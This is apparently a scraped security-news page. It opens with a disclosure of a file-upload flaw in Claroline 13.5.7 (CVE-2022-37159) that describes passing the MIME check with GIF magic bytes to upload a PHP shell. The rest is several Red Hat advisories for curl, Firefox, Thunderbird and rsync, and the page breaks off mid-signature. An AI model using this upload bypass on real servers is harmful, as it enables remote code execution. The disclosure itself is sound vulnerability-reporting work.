Claroline 13.5.7 and prior is vulnerable to Remote code execution via arbitrary file upload.

**Remote code execution via arbitrary file upload (version : 13.5.7)**

Claroline Connect app presents a RCE vulnerability because of the possibility to upload an arbitrary php file. This vulnerability is present on many upload forms, so I've personnally choosed the resource icon section.

The route **core/Controller/APINew/FileController.php** filters the upload image type by using the getMimeType() function from Symfony :

public function uploadImage(Request $request): JsonResponse
    {
        $files = $request\->files\->all();

        $objects = \[\];
        foreach ($files as $file) {
            if (0 !== strpos($file\->getMimeType(), 'image')) {
                throw new InvalidDataException('Invalid image type.');
            }

            $object = $this\->crud\->create(PublicFile::class, \[\], \['file' => $file, Crud::THROW\_EXCEPTION\]);
            $objects\[\] = $this\->serializer\->serialize($object);
        }

        return new JsonResponse($objects);
    }

It is possible to trick this function by adding some magic bytes like GIF8; which corresponds to the GIF image file type. The mime type image/gif should be also applied.

Then it is possible to get RCE by using the upload php shell :

**Fix suggestions :** Enhance file upload checks by adding real mime type verification (file content, bytes, size, etc).

CVE-2022-37159: claroline-CVEs/rce_file_upload.md at main · matthieu-hackwitharts/claroline-CVEs

Red Hat Security Advisory 2022-6157-01 - The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: curl security update  
Advisory ID:       RHSA-2022:6157-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6157  
Issue date:        2022-08-24  
CVE Names:         CVE-2022-32206 CVE-2022-32207 CVE-2022-32208  
====================================================================  
1. Summary:

An update for curl is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

The curl packages provide the libcurl library and the curl utility for  
downloading files from servers using various protocols, including HTTP,  
FTP, and LDAP.

Security Fix(es):

* curl: HTTP compression denial of service (CVE-2022-32206)

* curl: Unpreserved file permissions (CVE-2022-32207)

* curl: FTP-KRB bad message verification (CVE-2022-32208)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2099300 - CVE-2022-32206 curl: HTTP compression denial of service  
2099305 - CVE-2022-32207 curl: Unpreserved file permissions  
2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64:  
curl-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm  
curl-debugsource-7.76.1-14.el9_0.5.aarch64.rpm  
curl-minimal-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm  
libcurl-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm  
libcurl-devel-7.76.1-14.el9_0.5.aarch64.rpm  
libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm

ppc64le:  
curl-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm  
curl-debugsource-7.76.1-14.el9_0.5.ppc64le.rpm  
curl-minimal-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm  
libcurl-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm  
libcurl-devel-7.76.1-14.el9_0.5.ppc64le.rpm  
libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm

s390x:  
curl-debuginfo-7.76.1-14.el9_0.5.s390x.rpm  
curl-debugsource-7.76.1-14.el9_0.5.s390x.rpm  
curl-minimal-debuginfo-7.76.1-14.el9_0.5.s390x.rpm  
libcurl-debuginfo-7.76.1-14.el9_0.5.s390x.rpm  
libcurl-devel-7.76.1-14.el9_0.5.s390x.rpm  
libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.s390x.rpm

x86_64:  
curl-debuginfo-7.76.1-14.el9_0.5.i686.rpm  
curl-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm  
curl-debugsource-7.76.1-14.el9_0.5.i686.rpm  
curl-debugsource-7.76.1-14.el9_0.5.x86_64.rpm  
curl-minimal-debuginfo-7.76.1-14.el9_0.5.i686.rpm  
curl-minimal-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm  
libcurl-debuginfo-7.76.1-14.el9_0.5.i686.rpm  
libcurl-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm  
libcurl-devel-7.76.1-14.el9_0.5.i686.rpm  
libcurl-devel-7.76.1-14.el9_0.5.x86_64.rpm  
libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.i686.rpm  
libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
curl-7.76.1-14.el9_0.5.src.rpm

aarch64:  
curl-7.76.1-14.el9_0.5.aarch64.rpm  
curl-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm  
curl-debugsource-7.76.1-14.el9_0.5.aarch64.rpm  
curl-minimal-7.76.1-14.el9_0.5.aarch64.rpm  
curl-minimal-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm  
libcurl-7.76.1-14.el9_0.5.aarch64.rpm  
libcurl-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm  
libcurl-minimal-7.76.1-14.el9_0.5.aarch64.rpm  
libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm

ppc64le:  
curl-7.76.1-14.el9_0.5.ppc64le.rpm  
curl-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm  
curl-debugsource-7.76.1-14.el9_0.5.ppc64le.rpm  
curl-minimal-7.76.1-14.el9_0.5.ppc64le.rpm  
curl-minimal-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm  
libcurl-7.76.1-14.el9_0.5.ppc64le.rpm  
libcurl-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm  
libcurl-minimal-7.76.1-14.el9_0.5.ppc64le.rpm  
libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm

s390x:  
curl-7.76.1-14.el9_0.5.s390x.rpm  
curl-debuginfo-7.76.1-14.el9_0.5.s390x.rpm  
curl-debugsource-7.76.1-14.el9_0.5.s390x.rpm  
curl-minimal-7.76.1-14.el9_0.5.s390x.rpm  
curl-minimal-debuginfo-7.76.1-14.el9_0.5.s390x.rpm  
libcurl-7.76.1-14.el9_0.5.s390x.rpm  
libcurl-debuginfo-7.76.1-14.el9_0.5.s390x.rpm  
libcurl-minimal-7.76.1-14.el9_0.5.s390x.rpm  
libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.s390x.rpm

x86_64:  
curl-7.76.1-14.el9_0.5.x86_64.rpm  
curl-debuginfo-7.76.1-14.el9_0.5.i686.rpm  
curl-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm  
curl-debugsource-7.76.1-14.el9_0.5.i686.rpm  
curl-debugsource-7.76.1-14.el9_0.5.x86_64.rpm  
curl-minimal-7.76.1-14.el9_0.5.x86_64.rpm  
curl-minimal-debuginfo-7.76.1-14.el9_0.5.i686.rpm  
curl-minimal-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm  
libcurl-7.76.1-14.el9_0.5.i686.rpm  
libcurl-7.76.1-14.el9_0.5.x86_64.rpm  
libcurl-debuginfo-7.76.1-14.el9_0.5.i686.rpm  
libcurl-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm  
libcurl-minimal-7.76.1-14.el9_0.5.i686.rpm  
libcurl-minimal-7.76.1-14.el9_0.5.x86_64.rpm  
libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.i686.rpm  
libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-32206  
https://access.redhat.com/security/cve/CVE-2022-32207  
https://access.redhat.com/security/cve/CVE-2022-32208  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYwZpA9zjgjWX9erEAQjorQ/9G7KqpJrOkRXFM3iFlTVnUV/mGwdu4v5p  
dru+hce/7sEETk1Er9JXSBIZvtCk31V7QxswgIpgAwCBX/Ie/wr+tosF3jE+4YjL  
MCgtbk5Tzuak49Gsggz40GbvauEm3NiSyLPmG+A+tWrjqst3UWwobirEg7iVGUU1  
OOWKhNPzAr0iWoY1z2EBvBl23Fo8gaMYX9dd8dhcGza2OVMwzywrNW69h6bsQhDp  
Y5nAyBBCvwosqmDdIzZV5vDQEWoxb5uP+jnRgwtgJpaqdsn+ULkDuShIQZGntdA5  
fSCM57aSEmOY0bx/fE3/Z1b8Si3+GJ+j688rSlcRwlaA+Bxo5Az+PUbe4eWwTc2B  
vstfKWZHPLv/nyq+1JjV7/e+cuwAkn9YsT3/TUPlLtGjmg1x+4wytRXEF3uipFZR  
P5TJGLIlvaQbnpNfVfkxefCvvGRuomILaP12rRYuKuI1CR+jRLu3jEmFfoSyJs/q  
WR9OXuSQEFjTmLo3m8S7iRLN6bUWKItYhNmaSucZRgCvayT5BY54GbbssIAykQX8  
zLXIbqHQJec8sJuIdSwDSAuxyhrq30kSk0WLpfkK/uw179XpUphNK9CHL7VnGiVj  
haaef/yP7L12NBguJBmUnYWaWwa3sqepNQ3D8RQYXHrOmQ38VOjL76RQ0URYPkSB  
pl2iagecnP0=fQUi  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6157-01

Red Hat Security Advisory 2022-6178-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 91.13.0 ESR. Issues addressed include spoofing and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:6178-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6178  
Issue date:        2022-08-24  
CVE Names:         CVE-2022-38472 CVE-2022-38473 CVE-2022-38476  
                   CVE-2022-38477 CVE-2022-38478  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - ppc64le, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 91.13.0 ESR.

Security Fix(es):

* Mozilla: Address bar spoofing via XSLT error handling (CVE-2022-38472)

* Mozilla: Cross-origin XSLT Documents would have inherited the parent's  
permissions (CVE-2022-38473)

* Mozilla: Memory safety bugs fixed in Firefox 104 and Firefox ESR 102.2  
(CVE-2022-38477)

* Mozilla: Memory safety bugs fixed in Firefox 104, Firefox ESR 102.2, and  
Firefox ESR 91.13 (CVE-2022-38478)

* Mozilla: Data race and potential use-after-free in PK11_ChangePW  
(CVE-2022-38476)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2120673 - CVE-2022-38472 Mozilla: Address bar spoofing via XSLT error handling  
2120674 - CVE-2022-38473 Mozilla: Cross-origin XSLT Documents would have inherited the parent's permissions  
2120678 - CVE-2022-38476 Mozilla: Data race and potential use-after-free in PK11_ChangePW  
2120695 - CVE-2022-38477 Mozilla: Memory safety bugs fixed in Firefox 104 and Firefox ESR 102.2  
2120696 - CVE-2022-38478 Mozilla: Memory safety bugs fixed in Firefox 104, Firefox ESR 102.2, and Firefox ESR 91.13

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
firefox-91.13.0-1.el8_1.src.rpm

ppc64le:  
firefox-91.13.0-1.el8_1.ppc64le.rpm  
firefox-debuginfo-91.13.0-1.el8_1.ppc64le.rpm  
firefox-debugsource-91.13.0-1.el8_1.ppc64le.rpm

x86_64:  
firefox-91.13.0-1.el8_1.x86_64.rpm  
firefox-debuginfo-91.13.0-1.el8_1.x86_64.rpm  
firefox-debugsource-91.13.0-1.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-38472  
https://access.redhat.com/security/cve/CVE-2022-38473  
https://access.redhat.com/security/cve/CVE-2022-38476  
https://access.redhat.com/security/cve/CVE-2022-38477  
https://access.redhat.com/security/cve/CVE-2022-38478  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYwa9d9zjgjWX9erEAQhLCxAAi3vYj2HKA29pPYKEU+OkEdBllpI9UE4w  
OMDVmZ5Vq4B4UfP6iGQdyZKcK/WAbSKS03gYnFvIWBMcfAOpi1wqwZzosJVmxevx  
58XW1sH47bybiuOK4uWMflmlK3lxVppOCUEYu1ijmeEAgqlThAv11Ksiugfm7GFn  
hY/os3l4NvkmzA5ThssfAdcPigfSiJ52vSfurqL1HAaORN+9lZeOR2F73PgLVqMA  
CMj0gGVdXfSrkcZjqhu4+XFFsQ9xutcucN0dvqvgiqJDc3BeBWRSxL7GT6fENxBC  
1cyAiWj8ePTIlJIS7FqxNeo8Dr4ZoCLWyNPnKSPSa7DT0WV+Aw276BVOq+07BP69  
MEJpGMcJQtQoalXd8D4Jso5BsGWIoXLYCnKq15J8V5dexD370u/nRcPQFJ8vL1UZ  
ZiEZatmP0a4ZNffZWiSBjkVYVVOMpkWdFNqR21+9xzxAz6wzYUNY4EWMITLPvpBn  
FjyLjRRO8kKPbSDgnIps55JQmA41G27WILguF5i8RLd+2sQKmhvlA5G4R5aTu4Ks  
0Ggb4gWKqVPHGLGGejGZ/iU/uhD8wvOBttffP5aXf0UKiOhcykxI/ZCnkaT+Zyen  
CUOCyslTRUtTAkvL0Oh9Ys+nSPngOsSLpDmlXzOJDhTFKZegmi53dI74Jk6ZD4MW  
3fhovAeIFsk=2Xvf  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6178-01

Red Hat Security Advisory 2022-6165-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 91.13.0. Issues addressed include spoofing and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:6165-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6165  
Issue date:        2022-08-24  
CVE Names:         CVE-2022-38472 CVE-2022-38473 CVE-2022-38476  
                   CVE-2022-38477 CVE-2022-38478  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 91.13.0.

Security Fix(es):

* Mozilla: Address bar spoofing via XSLT error handling (CVE-2022-38472)

* Mozilla: Cross-origin XSLT Documents would have inherited the parent's  
permissions (CVE-2022-38473)

* Mozilla: Memory safety bugs fixed in Firefox 104 and Firefox ESR 102.2  
(CVE-2022-38477)

* Mozilla: Memory safety bugs fixed in Firefox 104, Firefox ESR 102.2, and  
Firefox ESR 91.13 (CVE-2022-38478)

* Mozilla: Data race and potential use-after-free in PK11_ChangePW  
(CVE-2022-38476)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2120673 - CVE-2022-38472 Mozilla: Address bar spoofing via XSLT error handling  
2120674 - CVE-2022-38473 Mozilla: Cross-origin XSLT Documents would have inherited the parent's permissions  
2120678 - CVE-2022-38476 Mozilla: Data race and potential use-after-free in PK11_ChangePW  
2120695 - CVE-2022-38477 Mozilla: Memory safety bugs fixed in Firefox 104 and Firefox ESR 102.2  
2120696 - CVE-2022-38478 Mozilla: Memory safety bugs fixed in Firefox 104, Firefox ESR 102.2, and Firefox ESR 91.13

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
thunderbird-91.13.0-1.el9_0.src.rpm

aarch64:  
thunderbird-91.13.0-1.el9_0.aarch64.rpm  
thunderbird-debuginfo-91.13.0-1.el9_0.aarch64.rpm  
thunderbird-debugsource-91.13.0-1.el9_0.aarch64.rpm

ppc64le:  
thunderbird-91.13.0-1.el9_0.ppc64le.rpm  
thunderbird-debuginfo-91.13.0-1.el9_0.ppc64le.rpm  
thunderbird-debugsource-91.13.0-1.el9_0.ppc64le.rpm

s390x:  
thunderbird-91.13.0-1.el9_0.s390x.rpm  
thunderbird-debuginfo-91.13.0-1.el9_0.s390x.rpm  
thunderbird-debugsource-91.13.0-1.el9_0.s390x.rpm

x86_64:  
thunderbird-91.13.0-1.el9_0.x86_64.rpm  
thunderbird-debuginfo-91.13.0-1.el9_0.x86_64.rpm  
thunderbird-debugsource-91.13.0-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-38472  
https://access.redhat.com/security/cve/CVE-2022-38473  
https://access.redhat.com/security/cve/CVE-2022-38476  
https://access.redhat.com/security/cve/CVE-2022-38477  
https://access.redhat.com/security/cve/CVE-2022-38478  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYwa9ttzjgjWX9erEAQhIYg//d/FBLsCJ0qFFYr8yEPLHSeiX7BNYCCKW  
mBqag7ynhJ2e0BeuLXyeijIkRW8RcnykVT+uaU8sVzr+FcgsqTD4v1tvdWvK/Pin  
h5ftKCpBvDLfngDq4c68xegIlakJJwChHdhUXtHDjZf00IMPsDTqesmts3H0oPOK  
DR205FzfCGhS/riRry2m03kynfgXtSTly8MMWbwGjXzFCcliECr3IoBkvUQ03D5r  
93wUhaQh+BNtsUZwadEuip2OEwEDJXKB8821s89jv2wiINllPJs6tJWTgN5B7Xgr  
67k2+jaC+ObhMteCGLGgVHGXuy319zouVHjK4tu++WH2rGJXrHWsrHgmT2Suwpeh  
I35OfUxn9Ha7zLqjsr7sArkmnfLov1Jas5HJE2d7Hf6BrdsiayOR1jiHDkYJdxdF  
dMYjni7EvemalzyvX/VjQ6EN9alcPZltxHFoZeYPD7ALuFheM+cbpkIjbgBjM1Zc  
TZInMd+/w58ISSd5BJU0n2i6IPUP4MNfmghq5jyYSz3VHw3tS1MPLqqysNuGFXeb  
mdCQNKWWuKMEZ4XtWjO4nh4ys5vPKxqKipUeI65Y7D9FtzwAvbuEqBgesMBZNj6y  
ymSXC3bic2XHKIUCAQ5V47Oua/+QJIOpH4XioIV6ulfjKth4QcZL/uh8aqElfnfm  
RoU8rhR4GG8=7S7L  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6165-01

Red Hat Security Advisory 2022-6158-01 - PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.

Red Hat Security Advisory 2022-6158-01

Red Hat Security Advisory 2022-6180-01 - The rsync utility enables the users to copy and synchronize files locally or across a network. Synchronization with rsync is fast because rsync only sends the differences in files over the network instead of sending whole files. The rsync utility is also used as a mirroring tool.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: rsync security update  
Advisory ID:       RHSA-2022:6180-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6180  
Issue date:        2022-08-24  
CVE Names:         CVE-2022-29154  
====================================================================  
1. Summary:

An update for rsync is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The rsync utility enables the users to copy and synchronize files locally  
or across a network. Synchronization with rsync is fast because rsync only  
sends the differences in files over the network instead of sending whole  
files. The rsync utility is also used as a mirroring tool.

Security Fix(es):

* rsync: remote arbitrary files write inside the directories of connecting  
peers (CVE-2022-29154)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2110928 - CVE-2022-29154 rsync: remote arbitrary files write inside the directories of connecting peers

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
rsync-3.1.3-14.el8_6.3.src.rpm

aarch64:  
rsync-3.1.3-14.el8_6.3.aarch64.rpm  
rsync-debuginfo-3.1.3-14.el8_6.3.aarch64.rpm  
rsync-debugsource-3.1.3-14.el8_6.3.aarch64.rpm

noarch:  
rsync-daemon-3.1.3-14.el8_6.3.noarch.rpm

ppc64le:  
rsync-3.1.3-14.el8_6.3.ppc64le.rpm  
rsync-debuginfo-3.1.3-14.el8_6.3.ppc64le.rpm  
rsync-debugsource-3.1.3-14.el8_6.3.ppc64le.rpm

s390x:  
rsync-3.1.3-14.el8_6.3.s390x.rpm  
rsync-debuginfo-3.1.3-14.el8_6.3.s390x.rpm  
rsync-debugsource-3.1.3-14.el8_6.3.s390x.rpm

x86_64:  
rsync-3.1.3-14.el8_6.3.x86_64.rpm  
rsync-debuginfo-3.1.3-14.el8_6.3.x86_64.rpm  
rsync-debugsource-3.1.3-14.el8_6.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-29154  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYwa9ZtzjgjWX9erEAQgmvQ/9FmzM7Jmz920bmACXLim9ggjCj2OqLSH5  
WC5//7e33xjwaslv3v9qNatPmTnW/UBNgrm3ddU+mT8YqAeStm6GO9PjpswHTNvX  
ROlVLsOqWHSyiHaPuBE6pfug7+dM0BlDtGRzkympqeeIN6Bqjs2tLkQ05qWngvj3  
g/6rNNL/N72+qfNYlLetfhDQtel1qAbu1RokYuMC9p3zRPdrvOMEuDE5bWxpZF0J  
hl/1B994ZbqVqg/Azgt5BjanRcg6w/fp7Vc0FwwQKnS12c++oe95PokM+/wIycfs  
naljKis0qHVhsTnTB699ci2cQ2u/yiIA91GB9bXpRlFiI2FTQz9M7tr909TRHDnx  
F/xHYFaoyQWqDuy/yA2zX7+sB5Jyh9IBWh3/44aKOxuzekfFTvThbcPtlMrSup/w  
wI6X55kB6s1BuJ8sToRiJAOotHqmlReayMEq7Yf2ppaC+oyQ6tK22uKltCOc80qO  
kgwIJMDF4M/AEOu7fiDQyV0yK87ZheFs4ZCtYU7Jp8fwBESrGEbiX0feD8I4HWSO  
iEC6BGtFoXNHQ/4hvxf8RFEm/FWLsnKSSbilgLns8UMveMwq+sob2Pqfru2VqwN6  
AoEimi24ZjyBzYIkTHb4GWGM7ON6kPSxAzP6H82ONeZyQeVjnj4rX3Px7Ja5Bxzr  
OSJSjw9dIpU=PuHU  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6180-01

Red Hat Security Advisory 2022-6168-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 91.13.0. Issues addressed include spoofing and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:6168-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6168  
Issue date:        2022-08-24  
CVE Names:         CVE-2022-38472 CVE-2022-38473 CVE-2022-38476  
                   CVE-2022-38477 CVE-2022-38478  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.2  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v. 8.2) - aarch64, ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 91.13.0.

Security Fix(es):

* Mozilla: Address bar spoofing via XSLT error handling (CVE-2022-38472)

* Mozilla: Cross-origin XSLT Documents would have inherited the parent's  
permissions (CVE-2022-38473)

* Mozilla: Memory safety bugs fixed in Firefox 104 and Firefox ESR 102.2  
(CVE-2022-38477)

* Mozilla: Memory safety bugs fixed in Firefox 104, Firefox ESR 102.2, and  
Firefox ESR 91.13 (CVE-2022-38478)

* Mozilla: Data race and potential use-after-free in PK11_ChangePW  
(CVE-2022-38476)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2120673 - CVE-2022-38472 Mozilla: Address bar spoofing via XSLT error handling  
2120674 - CVE-2022-38473 Mozilla: Cross-origin XSLT Documents would have inherited the parent's permissions  
2120678 - CVE-2022-38476 Mozilla: Data race and potential use-after-free in PK11_ChangePW  
2120695 - CVE-2022-38477 Mozilla: Memory safety bugs fixed in Firefox 104 and Firefox ESR 102.2  
2120696 - CVE-2022-38478 Mozilla: Memory safety bugs fixed in Firefox 104, Firefox ESR 102.2, and Firefox ESR 91.13

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v. 8.2):

Source:  
thunderbird-91.13.0-1.el8_2.src.rpm

aarch64:  
thunderbird-91.13.0-1.el8_2.aarch64.rpm  
thunderbird-debuginfo-91.13.0-1.el8_2.aarch64.rpm  
thunderbird-debugsource-91.13.0-1.el8_2.aarch64.rpm

ppc64le:  
thunderbird-91.13.0-1.el8_2.ppc64le.rpm  
thunderbird-debuginfo-91.13.0-1.el8_2.ppc64le.rpm  
thunderbird-debugsource-91.13.0-1.el8_2.ppc64le.rpm

x86_64:  
thunderbird-91.13.0-1.el8_2.x86_64.rpm  
thunderbird-debuginfo-91.13.0-1.el8_2.x86_64.rpm  
thunderbird-debugsource-91.13.0-1.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-38472  
https://access.redhat.com/security/cve/CVE-2022-38473  
https://access.redhat.com/security/cve/CVE-2022-38476  
https://access.redhat.com/security/cve/CVE-2022-38477  
https://access.redhat.com/security/cve/CVE-2022-38478  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

